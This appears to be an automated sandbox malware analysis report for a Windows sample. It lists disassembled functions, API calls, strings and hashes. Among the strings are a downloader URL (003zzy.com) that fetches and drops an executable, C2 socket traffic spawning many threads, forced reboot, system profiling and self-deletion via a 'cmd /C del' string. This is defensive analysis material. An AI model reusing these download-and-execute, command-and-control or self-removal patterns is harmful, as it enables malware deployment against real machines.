      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressInternetProc$CloseHandleLibraryLoadOpen$FileReadSleep
      • String ID: C:\WINDOWS\admier.exe$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MyAgrent$URLDownloadToFileA$http$http://www.003zzy.com/ad1in.htm$open$urlmon.dll$wininet.dll
      • API String ID: 4214780637-2500366654
      • Opcode ID: 075222d36303aed69531d2aa439cf0f5889836ec3cba74296871606b2dadfa53
      • Instruction ID: 0e75a09c8e8ff56f22cbdb51a2305809e01660930c3cab75a0091f40f6fe4516
      • Opcode Fuzzy Hash: 075222d36303aed69531d2aa439cf0f5889836ec3cba74296871606b2dadfa53
      • Instruction Fuzzy Hash: 09613AB0689380BFD3119BA4BE1AB453FA5B707714F26007AE503BA5EAD3B91434CB0D

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 105 40d07e-40d097 DeleteFileA 106 40d099-40d0af GetPEB 105->106 107 40d03f-40d056 GetProcAddress 105->107 109 40d0b1-40d0b8 106->109 110 40d0bc-40d0bd call 40d0c2 106->110 108 40d034-40d038 107->108 111 40d058-40d05e 108->111 112 40d03a-40d03d 108->112 114 40d060 111->114 115 40d01f-40d031 LoadLibraryA 111->115 112->107 116 40d061 call 406826 114->116 117 40d061 call 40682d 114->117 115->108 116->105 117->105
      APIs
      • GetProcAddress.KERNEL32(00000000), ref: 0040D047
      • DeleteFileA.KERNEL32(8.txt), ref: 0040D08A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressDeleteFileProc
      • String ID: 8.txt
      • API String ID: 3096485378-4108868096
      • Opcode ID: e073e4e49c09ac5b827c9c226607f75e97ca840cd67960b1e5b7da10af76f87f
      • Instruction ID: febd643f651e9d90d4cf83c175e36f54a99a928136d9d2cdfec75408947fadb0
      • Opcode Fuzzy Hash: e073e4e49c09ac5b827c9c226607f75e97ca840cd67960b1e5b7da10af76f87f
      • Instruction Fuzzy Hash: DE01B1B1C001149FD3259F94DD44B267769EB03328F25507AE80EBB682D7B9AC0ADA1D

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 118 40d06a-40d097 DeleteFileA 119 40d099-40d0af GetPEB 118->119 120 40d03f-40d056 GetProcAddress 118->120 122 40d0b1-40d0b8 119->122 123 40d0bc-40d0bd call 40d0c2 119->123 121 40d034-40d038 120->121 124 40d058-40d05e 121->124 125 40d03a-40d03d 121->125 127 40d060 124->127 128 40d01f-40d031 LoadLibraryA 124->128 125->120 130 40d061 call 406826 127->130 131 40d061 call 40682d 127->131 128->121 129 40d07e-40d097 DeleteFileA 129->119 129->120 130->129 131->129
      APIs
      • GetProcAddress.KERNEL32(00000000), ref: 0040D047
      • DeleteFileA.KERNEL32(8.txt), ref: 0040D08A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressDeleteFileProc
      • String ID: 8.txt
      • API String ID: 3096485378-4108868096
      • Opcode ID: 5b91d5f4cd43517152a4dd9c6756f64807f1832301644ec7de03dd8f5ce288da
      • Instruction ID: 92145c9a365872201136f2ad8642b24408a080cd8a60a41ca3e7793543610a8a
      • Opcode Fuzzy Hash: 5b91d5f4cd43517152a4dd9c6756f64807f1832301644ec7de03dd8f5ce288da
      • Instruction Fuzzy Hash: A0E0EC309852408FC326DBB48959916BB71EB03315F1564B6D009F76A2C378DC4EC61D

      Control-flow Graph

      APIs
      • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,76835280), ref: 004011FA
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,76835280), ref: 00401214
      • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00401231
      • Sleep.KERNEL32(00000001,00000000,?,76835280), ref: 00401242
      • lstrcat.KERNEL32(?,?), ref: 00401284
      • lstrcat.KERNEL32(?,?), ref: 004012C7
      • GetCurrentProcess.KERNEL32 ref: 00401302
      • SetPriorityClass.KERNEL32(00000000), ref: 0040130F
      • GetCurrentThread.KERNEL32 ref: 00401313
      • SetThreadPriority.KERNEL32(00000000), ref: 00401320
      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,?,00000100), ref: 00401342
      • SetPriorityClass.KERNEL32(?,00000040), ref: 00401354
      • SetThreadPriority.KERNEL32(00000100,000000F1), ref: 0040135D
      • ResumeThread.KERNEL32(00000100), ref: 00401364
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: PriorityThread$ClassCurrentNameProcesslstrcat$CreateEnvironmentFileModulePathResumeShortSleepVariable
      • String ID: /C del $ > nul$COMSPEC$D
      • API String ID: 1484168510-811065519
      • Opcode ID: 80f2990cbe446eeb8af5fe5e6946dc62fec6deab8f17557c22f9a638df64cf6d
      • Instruction ID: 83a5a0624438e48de483ece212b65a11f95c74cb0b9da3eb9e72a1bcf4c41a49
      • Opcode Fuzzy Hash: 80f2990cbe446eeb8af5fe5e6946dc62fec6deab8f17557c22f9a638df64cf6d
      • Instruction Fuzzy Hash: B541A071644300AFE324CB75DC49FABB7E9BBC4710F008A2DB69AA72D0DBB599048B55

      Control-flow Graph

      APIs
      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00401100
      • Sleep.KERNEL32(00000001), ref: 0040111A
      • GetProcAddress.KERNEL32(00000000,CreateProcessInternalA), ref: 00401122
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressLibraryLoadProcSleep
      • String ID: CreateProcessInternalA$kernel32.dll
      • API String ID: 188063004-3660314680
      • Opcode ID: c94f652345d368492b510be50749c763d3809195a6ab1b817fa2ed5e1467b805
      • Instruction ID: 17414ca3e7859be5678fcf000ff8f36a898fc3596c14bf2c8eff9706db6db05c
      • Opcode Fuzzy Hash: c94f652345d368492b510be50749c763d3809195a6ab1b817fa2ed5e1467b805
      • Instruction Fuzzy Hash: 9911E731680318BBE720EF94DD0AFDE7B78DB85711F1041A6FE09BA2C0D6B469548BE5

      Control-flow Graph

      APIs
      • lstrcat.KERNEL32(?,0040655D), ref: 00406851
      • lstrcat.KERNEL32(00000000,WinH83.exe), ref: 0040685D
      • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 00406885
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00406899
      • WriteFile.KERNEL32(00000000,00401000,00000040,00406559,00000000), ref: 004068C5
      • CloseHandle.KERNEL32(00000000), ref: 004068D4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$lstrcat$CloseCreateHandlePointerWrite
      • String ID: WinH83.exe
      • API String ID: 3608828543-543210326
      • Opcode ID: 9a5a1cb60774c3cd54556950267b8d06c8b4aba6bfc6c83be5b6be6d6c1ec890
      • Instruction ID: 69b20180e3b7220f36dca54e68a66d8a4ad28fd96bca0297548ba8a7c77a2430
      • Opcode Fuzzy Hash: 9a5a1cb60774c3cd54556950267b8d06c8b4aba6bfc6c83be5b6be6d6c1ec890
      • Instruction Fuzzy Hash: 2A1196B1690344BBDB10DF50CCC9F693369FB09700F158039BB0ABE2D1E7B86914862D

      Control-flow Graph

      APIs
      • lstrcat.KERNEL32(?,0040655D), ref: 00406851
      • lstrcat.KERNEL32(00000000,WinH83.exe), ref: 0040685D
      • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 00406885
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00406899
      • WriteFile.KERNEL32(00000000,00401000,00000040,00406559,00000000), ref: 004068C5
      • CloseHandle.KERNEL32(00000000), ref: 004068D4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$lstrcat$CloseCreateHandlePointerWrite
      • String ID: WinH83.exe
      • API String ID: 3608828543-543210326
      • Opcode ID: 64929941959a351eb6e5df3572f0dec3118bb976535e345188da3b5fc1adc2ac
      • Instruction ID: 48e4d2b60afa01354a8a6fe0455daa5a0df1e06f04bad4fcbe58ea4c3ca8c96e
      • Opcode Fuzzy Hash: 64929941959a351eb6e5df3572f0dec3118bb976535e345188da3b5fc1adc2ac
      • Instruction Fuzzy Hash: 5D1166B1690354BBDB10DF50CCD9F693369BB09704F158039BB0ABE2D1E7B86914862D

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 132 40d016-40d01c 133 40d01f-40d031 LoadLibraryA 132->133 134 40d034-40d038 133->134 135 40d058-40d05e 134->135 136 40d03a-40d03d 134->136 135->133 138 40d060 135->138 137 40d03f-40d056 GetProcAddress 136->137 137->134 144 40d061 call 406826 138->144 145 40d061 call 40682d 138->145 139 40d07e-40d097 DeleteFileA 139->137 140 40d099-40d0af GetPEB 139->140 141 40d0b1-40d0b8 140->141 142 40d0bc-40d0bd call 40d0c2 140->142 144->139 145->139
      APIs
      • LoadLibraryA.KERNEL32(00400000,00400000), ref: 0040D028
      • GetProcAddress.KERNEL32(00000000), ref: 0040D047
      Memory Dump Source
      • Source File: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID:
      • API String ID: 2574300362-0
      • Opcode ID: 14e5a918ddaf0084f4d854524b0471831e9950063073d57c4f2344471fdd9e3b
      • Instruction ID: 6c3bf372d224c83a881a8ca97f7b757c9271284dc59a6cb52084675be33e3eb9
      • Opcode Fuzzy Hash: 14e5a918ddaf0084f4d854524b0471831e9950063073d57c4f2344471fdd9e3b
      • Instruction Fuzzy Hash: 42E065B18401289BD3245B40ED44762371CDB02328F194079EC097F682D77E6C07861C

      Non-executed Functions

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 151 4023a0-4023b2 152 4025c5-402625 socket call 4030e0 htons connect 151->152 153 4023b8-40241a lstrlen call 404a50 call 402c80 strstr 151->153 159 402c71-402c7d 152->159 160 40262b-402650 call 4049d0 152->160 163 402420-4024a0 153->163 164 4024a2-4024da call 401440 _strlwr lstrcpy strstr 153->164 168 402656-40269e call 402fd0 call 402cb0 call 404780 send 160->168 169 402c6a-402c6b closesocket 160->169 166 402517-40252c strstr 163->166 164->166 175 4024dc 164->175 172 402541-40254e strstr 166->172 173 40252e-40253d 166->173 168->169 185 4026a4-4026a7 168->185 169->159 172->152 174 402550-402594 strcspn strncpy strcspn strstr 172->174 173->172 174->152 177 402596-4025c0 strcspn strncpy atoi 174->177 178 4024e2-402515 Sleep call 401440 _strlwr lstrcpy strstr 175->178 177->152 178->166 186 402c54-402c64 InterlockedExchange shutdown 185->186 187 4026ad 185->187 186->169 188 4026b3-4026f1 select 187->188 188->186 189 4026f7-4026f9 188->189 189->188 190 4026fb-40270b __WSAFDIsSet 189->190 190->188 191 40270d-40272c recv 190->191 191->186 192 402732-40273e 191->192 193 402744-402759 InterlockedExchange 192->193 194 402a3b-402a41 192->194 195 402a18 193->195 196 40275f-402768 193->196 197 402a47 194->197 198 402b3d-402b43 194->198 205 402a22 195->205 199 402786-402789 196->199 200 40276a-40277e CreateThread 196->200 201 402a4d-402a53 197->201 202 402b2f-402b36 197->202 203 402b45-402b4b 198->203 204 402b8a-402b97 InterlockedExchange 198->204 209 40278b-40278f 199->209 210 4027ad-4027b0 199->210 200->200 206 402780 200->206 211 402b06-402b0c 201->211 212 402a59 201->212 207 402b38 202->207 208 402b9c-402bb1 OpenMutexA 202->208 213 402b6b-402b72 203->213 214 402b4d-402b53 203->214 204->188 219 402a27-402a33 CreateThread 205->219 206->199 207->188 217 402bc1-402c4e GetSystemDirectoryA lstrcat * 2 DeleteFileA call 4022c0 wsprintfA SHDeleteKeyA closesocket ExitProcess 208->217 218 402bb3-402bbb ReleaseMutex CloseHandle 208->218 209->210 220 402791-4027a5 CreateThread 209->220 224 4027b2-4027c3 CreateThread 210->224 225 4027c9-4027cc 210->225 211->188 216 402b12-402b2a call 401390 ExitWindowsEx 211->216 221 402ae9-402b01 call 401390 ExitWindowsEx 212->221 222 402a5f-402a65 212->222 213->188 215 402b78-402b85 call 401510 213->215 214->188 223 402b59-402b66 call 401640 214->223 215->188 216->188 218->217 232 402a05-402a0f 219->232 233 402a35 219->233 220->220 234 4027a7 220->234 221->188 235 402a93-402ae4 shutdown closesocket 222->235 236 402a67-402a6d 222->236 223->188 224->225 226 4027f0-4027f3 225->226 227 4027ce-4027d2 225->227 242 4027f5-4027f9 226->242 243 402817-40281a 226->243 227->226 238 4027d4-4027e8 CreateThread 227->238 232->205 241 402a11-402a16 232->241 233->194 234->210 235->188 236->188 246 402a73-402a8e send 236->246 238->238 248 4027ea 238->248 241->219 242->243 249 4027fb-40280f CreateThread 242->249 250 40281c-402820 243->250 251 40283e-402841 243->251 246->188 248->226 249->249 252 402811 249->252 250->251 253 402822-402836 CreateThread 250->253 254 402843-402847 251->254 255 402865-402868 251->255 252->243 253->253 258 402838 253->258 254->255 259 402849-40285d CreateThread 254->259 256 40286a-40286e 255->256 257 40288c-40288f 255->257 256->257 260 402870-402884 CreateThread 256->260 261 402891-402895 257->261 262 4028b3-4028b6 257->262 258->251 259->259 263 40285f 259->263 260->260 264 402886 260->264 261->262 265 402897-4028ab CreateThread 261->265 266 4028b8-4028bc 262->266 267 4028eb-4028ee 262->267 263->255 264->257 265->265 268 4028ad 265->268 269 4028d4-4028e5 CreateThread 266->269 270 4028be-4028d2 CreateThread 266->270 271 4028f0-40290d CreateThread * 2 267->271 272 402913-402916 267->272 268->262 269->267 270->269 270->270 271->272 273 402918-40291c 272->273 274 40293a-40293d 272->274 273->274 275 40291e-402932 CreateThread 273->275 276 402961-402964 274->276 277 40293f-402943 274->277 275->275 278 402934 275->278 280 402966-40296a 276->280 281 402988-40298b 276->281 277->276 279 402945-402959 CreateThread 277->279 278->274 279->279 282 40295b 279->282 280->281 283 40296c-402980 CreateThread 280->283 284 40298d-402991 281->284 285 4029af-4029b2 281->285 282->276 283->283 286 402982 283->286 284->285 287 402993-4029a7 CreateThread 284->287 288 4029b4-4029c0 CreateThread 285->288 289 4029c6-4029cc 285->289 286->281 287->287 291 4029a9 287->291 288->289 289->194 290 4029ce-402a03 recv 289->290 290->232 290->233 291->285
      APIs
      • lstrlen.KERNEL32(O5WGU2RYGMXDGMZSGIXG64THHI4DG===), ref: 004023CD
        • Part of subcall function 00402C80: wvsprintfA.USER32(?,?,?), ref: 00402C98
        • Part of subcall function 00402C80: OutputDebugStringA.KERNEL32(00000000,?,?,?), ref: 00402CA3
      • strstr.MSVCRT ref: 00402413
      • _strlwr.MSVCRT ref: 004024B6
      • lstrcpy.KERNEL32(?,00000000), ref: 004024C7
      • strstr.MSVCRT ref: 004024D3
      • Sleep.KERNEL32(00002710), ref: 004024E7
      • _strlwr.MSVCRT ref: 004024F7
      • lstrcpy.KERNEL32(?,00000000), ref: 00402502
      • strstr.MSVCRT ref: 0040250E
      • strstr.MSVCRT ref: 00402525
      • strstr.MSVCRT ref: 00402547
      • strcspn.MSVCRT ref: 0040256A
      • strncpy.MSVCRT ref: 00402579
      • strcspn.MSVCRT ref: 00402581
      • strstr.MSVCRT ref: 0040258D
      • strcspn.MSVCRT ref: 004025A7
      • strncpy.MSVCRT ref: 004025B0
      • atoi.MSVCRT(?), ref: 004025B7
      • socket.WS2_32(00000002,00000001,00000006), ref: 004025CB
      • htons.WS2_32(00000000), ref: 00402609
      • connect.WS2_32(00000000,?,00000010), ref: 0040261C
      • send.WS2_32(00000000,?,000000E8,00000000), ref: 00402696
      • select.WS2_32(?,?,00000000,00000000,?), ref: 004026E8
      • __WSAFDIsSet.WS2_32(?,?), ref: 00402704
      • recv.WS2_32(?,00409A80,0000007C,00000000), ref: 00402724
      • InterlockedExchange.KERNEL32(00409A7C,00000000), ref: 0040274A
      • CreateThread.KERNEL32(00000000,00000000,00403110,00000000,00000000,00000000), ref: 00402774
      • CreateThread.KERNEL32(00000000,00000000,00403110,00000000,00000000,00000000), ref: 0040279B
      • CreateThread.KERNEL32(00000000,00000000,00403110,00000000,00000000,00000000), ref: 004027BC
      • CreateThread.KERNEL32(00000000,00000000,00403440,00000000,00000000,00000000), ref: 004027DE
      • CreateThread.KERNEL32(00000000,00000000,00403440,00000000,00000000,00000000), ref: 00402805
      • CreateThread.KERNEL32(00000000,00000000,00403A30,00000000,00000000,00000000), ref: 0040282C
      • CreateThread.KERNEL32(00000000,00000000,004035D0,00000000,00000000,00000000), ref: 00402853
      • CreateThread.KERNEL32(00000000,00000000,00403710,00000000,00000000,00000000), ref: 0040287A
      • CreateThread.KERNEL32(00000000,00000000,00403850,00000000,00000000,00000000), ref: 004028A1
      • CreateThread.KERNEL32(00000000,00000000,00403BA0,00000000,00000000,00000000), ref: 004028C8
      • CreateThread.KERNEL32(00000000,00000000,00403CC0,00000000,00000000,00000000), ref: 004028DE
      • CreateThread.KERNEL32(00000000,00000000,00403CC0,00000000,00000000,00000000), ref: 004028FA
      • CreateThread.KERNEL32(00000000,00000000,00403D70,00000000,00000000,00000000), ref: 00402906
      • CreateThread.KERNEL32(00000000,00000000,00403CC0,00000000,00000000,00000000), ref: 00402928
      • CreateThread.KERNEL32(00000000,00000000,00403E20,00000000,00000000,00000000), ref: 0040294F
      • CreateThread.KERNEL32(00000000,00000000,00404340,00000000,00000000,00000000), ref: 00402976
      • CreateThread.KERNEL32(00000000,00000000,00404090,00000000,00000000,00000000), ref: 0040299D
      • CreateThread.KERNEL32(00000000,00000000,00404490,00000000,00000000,00000000), ref: 004029BE
      • recv.WS2_32(?,00408A7C,?,00000000), ref: 004029F4
      • CreateThread.KERNEL32(00000000,00000000,004046C0,00000000,00000000,00000000), ref: 00402A29
      • send.WS2_32(?,?,00000004,00000000), ref: 00402A88
      • shutdown.WS2_32(?,00000002), ref: 00402AD3
      • closesocket.WS2_32(?), ref: 00402ADE
      • ExitWindowsEx.USER32(00000002,00000000), ref: 00402AFB
      • ExitWindowsEx.USER32(00000001,00000000), ref: 00402B24
      • InterlockedExchange.KERNEL32(00409A7C,00000001), ref: 00402B91
      • OpenMutexA.KERNEL32(001F0001,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===), ref: 00402BA7
      • ReleaseMutex.KERNEL32(00000000), ref: 00402BB4
      • CloseHandle.KERNEL32(00000000), ref: 00402BBB
      • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 00402BCB
      • lstrcat.KERNEL32(?,0040862C), ref: 00402BE1
      • lstrcat.KERNEL32(?,WinH83.exe), ref: 00402BED
      • DeleteFileA.KERNEL32(?), ref: 00402BF4
      • wsprintfA.USER32 ref: 00402C26
      • SHDeleteKeyA.SHLWAPI(80000002,?,?,00000000,00000000,?), ref: 00402C3C
      • closesocket.WS2_32(?), ref: 00402C47
      • ExitProcess.KERNEL32 ref: 00402C4E
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: CreateThread$strstr$Exitstrcspn$DeleteExchangeInterlockedMutexWindows_strlwrclosesocketlstrcatlstrcpyrecvsendstrncpy$CloseDebugDirectoryFileHandleOpenOutputProcessReleaseSleepStringSystematoiconnecthtonslstrlenselectshutdownsocketwsprintfwvsprintf
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===$SYSTEM\CurrentControlSet\Services\%s$SeShutdownPrivilege$WinH83$WinH83.exe$http
      • API String ID: 2249562296-380182697
      • Opcode ID: 51b1d1f3a17f7fde80cfcb2049c1321e642544511561daa928ada41410eabac3
      • Instruction ID: 052ee0806c164ae71cab3f55b8a9cb77ea0192696f3459dbd542b9296f22baf5
      • Opcode Fuzzy Hash: 51b1d1f3a17f7fde80cfcb2049c1321e642544511561daa928ada41410eabac3
      • Instruction Fuzzy Hash: 8332C4B13002146BD7249B249FC9FAB729CEB84744F10493EFA46B32D1DAB8DD458B6D

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 332 402cb0-402d0e RegOpenKeyExA 333 402d14-402d70 RegQueryValueExA RegCloseKey 332->333 334 402db6-402dd1 332->334 335 402d72 333->335 336 402d95-402db4 333->336 337 402dd3-402dfa GetVersionExA 334->337 338 402d78-402d8e _strnicmp 335->338 336->337 339 402e09-402e11 337->339 340 402dfc-402e08 337->340 338->336 341 402d90-402d93 338->341 342 402e13-402e14 339->342 343 402e7c-402e84 339->343 341->336 341->338 345 402ec7-402fc9 wsprintfA GlobalMemoryStatusEx call 4056b0 _ui64toa GetSystemDefaultUILanguage 342->345 346 402e1a-402e24 342->346 344 402e86-402e8f 343->344 343->345 347 402e91-402e9a 344->347 348 402e9c-402e9f 344->348 349 402e31-402e34 346->349 350 402e26-402e2f 346->350 352 402eaa-402ec5 347->352 348->345 353 402ea1-402ea5 348->353 354 402e36-402e40 349->354 355 402e6c-402e6f 349->355 350->352 352->345 353->352 358 402e42-402e4b 354->358 359 402e4d-402e50 354->359 355->345 357 402e71-402e7a 355->357 357->352 358->352 360 402e52-402e5b 359->360 361 402e5d-402e5f 359->361 360->352 361->345 362 402e61-402e6a 361->362 362->352
      APIs
      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,00000000), ref: 00402D06
      • RegQueryValueExA.ADVAPI32 ref: 00402D48
      • RegCloseKey.ADVAPI32(?), ref: 00402D53
      • _strnicmp.MSVCRT ref: 00402D87
      • GetVersionExA.KERNEL32(?), ref: 00402DF2
      • wsprintfA.USER32 ref: 00402EE6
      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00402EFC
      • _ui64toa.MSVCRT ref: 00402F2A
      • GetSystemDefaultUILanguage.KERNEL32 ref: 00402FA0
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
